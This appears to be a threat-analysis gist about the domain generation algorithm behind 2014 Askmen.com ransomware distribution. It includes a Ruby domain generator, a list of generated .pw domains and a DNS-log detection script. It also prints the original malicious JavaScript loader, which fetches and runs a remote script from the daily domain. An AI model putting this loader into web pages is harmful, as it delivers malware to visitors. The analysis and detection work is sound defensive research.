Last active
August 29, 2015 14:03
Generated Domains Used In Askmen.com Ransomware Distribution http://threatglass.com/malicious_urls/8936
```ruby
require 'zlib'
require 'date'

# CRC32 of the date written as "year+=+month+=+day" (no zero padding).
def gen_crc(date:)
  str = [date.year, date.month, date.day].join("+=+")
  Zlib.crc32(str)
end

start_dt = Date.parse('2014-06-01')
end_dt = start_dt + 30

# One row per day: date, generated .pw domain, registry whois lookup URL.
date_domains = (start_dt..end_dt).map do |dt|
  gen_str = gen_crc(date: dt).to_s(16)
  [dt, gen_str + ".pw", "http://registry.pw/whois/?query=#{gen_str}&output=nice"]
end

puts date_domains.map { |dd| dd.join(",") }
```
```
2014-06-18 9b66653c.pw http://registry.pw/whois/?query=9b66653c&output=nice
2014-06-19 ec6155aa.pw http://registry.pw/whois/?query=ec6155aa&output=nice
2014-06-20 be90becd.pw http://registry.pw/whois/?query=be90becd&output=nice
2014-06-21 c9978e5b.pw http://registry.pw/whois/?query=c9978e5b&output=nice
2014-06-22 509edfe1.pw http://registry.pw/whois/?query=509edfe1&output=nice
2014-06-23 2799ef77.pw http://registry.pw/whois/?query=2799ef77&output=nice
```
```javascript
var wqqqqwqwqwqqqqwqq = 'qqwqwqqwwqwwwqqwwqwwqw';

// Builds the standard CRC32 lookup table (polynomial 0xEDB88320).
function crcTableG() {
  var c;
  var crcTable = [];
  for (var n = 0; n < 256; n++) {
    c = n;
    for (var k = 0; k < 8; k++) {
      c = ((c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));
    }
    crcTable[n] = c;
  }
  return crcTable;
};

function crc32(str) {
  var crcTable = crcTableG();
  var crc = 0 ^ (-1);
  for (var i = 0; i < str.length; i++) {
    crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];
  }
  return (crc ^ (-1)) >>> 0;
};

// Seed string: the client's UTC date as year+=+month+=+day, without zero padding.
var d = "+=+";
var date = new Date();
var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth() + 1) + d + date.getUTCDate();

// Callback that injects a decoded payload as a script; b64dec is not defined in this snippet.
window.rctm = function (p) {
  var s = document.createElement('SCRIPT');
  s.text = b64dec(p).replace(/\0+/, '');
  document.body.appendChild(s);
};

// Loads nbe.html from the .pw domain named by the hex CRC32 of the date string.
var s = document.createElement('SCRIPT');
s.src = "http://" + crc32(dateStr).toString(16) + ".pw/nbe.html?" + Math.random();
document.body.appendChild(s);
```
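An added example, not part of the gist: a Ruby check that rebuilds the generator's domain list for a date window and flags matching query names in DNS logs, reporting when the log date differs from the date that seeds the domain (the script picks the domain from the client's own clock). The log line format, the function names and the sample lines are assumptions constructed for illustration; the two matching domains come from the output listing above.

```ruby
require 'zlib'
require 'date'
require 'time'

# Same seed as the generator above: year, month, day (no zero padding) joined by "+=+".
def dga_domain(date)
  seed = [date.year, date.month, date.day].join('+=+')
  Zlib.crc32(seed).to_s(16) + '.pw'
end

# Map each generated domain in the window back to the date that seeds it.
def dga_index(from, to)
  (from..to).map { |d| [dga_domain(d), d] }.to_h
end

# Return one hash per log line whose query name is a generated domain.
# Assumed line format (hypothetical): "<ISO 8601 UTC timestamp> <client> <qname>".
def find_dga_hits(lines, from:, to:)
  index = dga_index(from, to)
  lines.each_with_object([]) do |line, hits|
    ts, client, qname = line.split
    next if qname.nil?
    host = qname.downcase.chomp('.') # DNS names are case-insensitive and may end in "."
    seed_date = index[host]
    next if seed_date.nil?
    seen = Time.iso8601(ts).utc.to_date
    # A non-zero offset means the client clock disagrees with the log timestamp.
    hits << { client: client, domain: host, seed_date: seed_date,
              day_offset: (seen - seed_date).to_i }
  end
end

# Constructed sample log, not real traffic.
SAMPLE_LOG = [
  '2014-06-18T09:12:44Z 10.0.0.21 9b66653c.pw.',
  '2014-06-18T09:12:45Z 10.0.0.21 www.example.com.',
  '2014-06-20T23:58:10Z 10.0.0.34 C9978E5B.pw',
  '2014-06-22T14:01:02Z 10.0.0.57 unrelated.pw'
].freeze

find_dga_hits(SAMPLE_LOG, from: Date.new(2014, 6, 1), to: Date.new(2014, 7, 1)).each do |h|
  puts h.values.join(',')
end
```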